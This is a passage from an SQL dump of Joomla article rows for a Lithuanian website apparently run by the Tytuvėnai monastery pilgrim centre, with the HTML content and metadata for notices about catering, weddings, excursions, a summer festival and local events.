!important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/adventine_programa/main/main1.jpg\" border=\"0\" alt=\"\" /></span></span></span></span></span></p>',1,0,0,44,'2017-12-07 21:05:26',135,'','2017-12-07 21:08:06',135,0,'0000-00-00 00:00:00','2017-12-07 21:05:26','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/adventine_programa\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,0,85,'','',1,2221,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(298,387,'Pasiūlymas šv. Valentino dienai','pasiulymas-sv-valentino-dienai','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Artėja nuostabi meilės diena - šv. Valentino diena...</span></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/valentino/valentino.jpg\" border=\"0\" alt=\"\" style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\" /></p>',1,0,0,44,'2018-01-08 20:19:32',135,'','2018-01-08 20:19:43',135,0,'0000-00-00 00:00:00','2018-01-08 20:19:32','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/valentino\\/valentino_main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,84,'','',1,2214,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(299,388,'Mieli Jaunavedžiai','mieli-jaunavedziai','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Jau vyksta registracija salės ar kiemelio nuomai Jūsų nuostabios šventės pasveikinimui.</span></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/vestuves/vestuves2.jpg\" border=\"0\" alt=\"\" style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\" /></p>',1,0,0,44,'2018-01-08 20:25:26',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2018-01-08 20:25:26','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/vestuves\\/vest_main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,83,'','',1,2296,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(320,409,'Gedulingi pietūs','gedulingi-pietus','','<p><img src=\"images/GEDULINGI PIETS-page-001.jpg\" border=\"0\" alt=\"\" /></p>','',1,0,0,31,'2018-06-18 10:19:40',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2018-06-18 10:19:40','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,5,'','',1,1309,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(321,410,'Maitinimo meniu','maitinimo-meniu','','<p>Tytuvėnai – miestelis įsikūręs šiaurės Lietuvoje, kur susikerta keliai iš Radviliškio, Šiaulių, Kelmės, Šiluvos. Vidury miesto stovi didinga Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčia ir Tytuvėnų bernardinų vienuolynas. Bažnyčios ir vienuolyno ansamblyje galite gauti ne tik kultūrines programas, tokias kaip ekskursijos, edukacijos (Piligrimų gira, Vaistažolių edukacinė programa), gido paslaugos, dviračių nuoma, piligrimų namai „Domus Rafaeli“, bet ir maitinimo paslaugas Tytuvėnų vienuolyno patalpose. Tytuvėnų vienuolyne priimami banketai, furšetai, grupių maitinimas, šventiniai staliukai, krikštynos, vestuvės. Aplinka ir maistu nenusivilsite.</p>','',0,0,0,31,'2018-06-18 11:21:28',135,'','2018-06-18 11:24:10',135,0,'0000-00-00 00:00:00','2018-06-18 11:21:28','0000-00-00 00:00:00','{\"image_intro\":\"images\\/Maitinimo logo.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,4,'','',1,23,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(322,411,'Maitinimas','maitinimas','','<p style=\"text-align: justify;\"><img src=\"images/meniu/2024/maitinimas/1.jpg\" border=\"0\" alt=\"\" width=\"1160\" /><br /> <img src=\"images/meniu/2024/maitinimas/2.jpg\" border=\"0\" alt=\"\" width=\"1160\" /><br /> <img src=\"images/meniu/2024/maitinimas/3.jpg\" border=\"0\" alt=\"\" width=\"1160\" /><br /> <img src=\"images/meniu/2024/maitinimas/4.jpg\" border=\"0\" alt=\"\" width=\"1160\" /></p>\r\n<p><br /> <img src=\"images/meniu/2024/maitinimas/1a.jpg\" border=\"0\" alt=\"\" width=\"1160\" /> <img src=\"images/meniu/2024/maitinimas/2a.jpg\" border=\"0\" alt=\"\" width=\"1160\" /></p>\r\n<p> </p>','',1,0,0,31,'2018-06-18 12:18:47',135,'','2024-05-01 18:01:24',135,0,'0000-00-00 00:00:00','2018-06-18 12:18:47','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',21,0,3,'','',1,11050,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(327,416,'Šventinės ekskursijos','kvieciame-visus-i-vakariene-baltas-vakaras-6','','<p>Kviečiame užsisakyti šventines ekskursijas!</p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/111.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2017-08-06 08:07:32',135,'','2018-11-02 08:42:48',135,0,'0000-00-00 00:00:00','2017-08-06 08:07:32','0000-00-00 00:00:00','{\"image_intro\":\"images\\/111dfasdfsaf.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',8,0,61,'','',1,2121,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(317,406,'XV tarptautinis Tytuvėnų vasaros festivalis','xv-tarptautinis-tytuvenu-vasaros-festivalis','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">2018 m. birželio 10 d. - rugpjūčio 26 d.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/fest18/fest1.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/fest18/fest2.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2018-05-31 05:51:05',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2018-05-31 05:51:05','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/fest18\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,68,'','',1,2976,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(300,389,'Adventur 2018','adventur-2018','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Sausio 26-28 d. vyko tarptautinė turizmo paroda „Adventur 2018“.</span></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal <span>width=400</span>}stories/naujienos/adventur2018/pics{/gallery}</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Parodoje dalyvavo Kelmės rajono savivaldybė kartu  su VšĮ Tytuvėnų piligrimų centru, Kražių Motiejaus Kazimiero Sarbievijaus kultūros centro turizmo informacijos centru ir Kelmės turizmo ir verslo informacijos centru. Parodoje buvo pristatytos  naujos edukacinės programos, lankytini objektai, apgyvendinimo ir maitinimo paslaugos, įvairios laisvalaikio galimybės bei turizmo maršrutai. Daug lankytojų dėmesio sulaukė galimybė sudėti Lietuvos šimtmečiui skirtą Lietuvos dėlionę su visais joje esančiais rajonais. Parodoje pristatyta 2018 metų Mažoji kultūros sostinė – Kražiai. Lankytojai buvo vaišinami įvairiais Kelmės krašte gaminamais produktais, kurie yra pristatomi per edukacines programas.</span></span></span></span></span></p>',1,0,0,44,'2018-02-08 20:38:15',135,'','2018-02-08 20:39:39',135,0,'0000-00-00 00:00:00','2018-02-08 20:38:15','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/adventur2018\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,82,'','',1,2252,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(301,390,'Vasario 16 d. minėjimas','vasario-16-d-minejimas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Vasario 16 d. Tytuvėnų kultūros centre vyko Lietuvos Valstybės atkūrimo šimtmečiui skirtas minėjimas \"O, Lietuva, būk per amžius laisva\".</span></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal <span>width=200</span>}stories/naujienos/100{/gallery}</span></span></span></span></span></p>',1,0,0,44,'2018-02-21 05:49:57',135,'','2018-02-21 05:50:28',135,0,'0000-00-00 00:00:00','2018-02-21 05:49:57','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/100\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,81,'','',1,2240,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(302,391,'Laiko ženklai','laiko100','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">ATKURTAI LIETUVOS VALSTYBEI 100<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      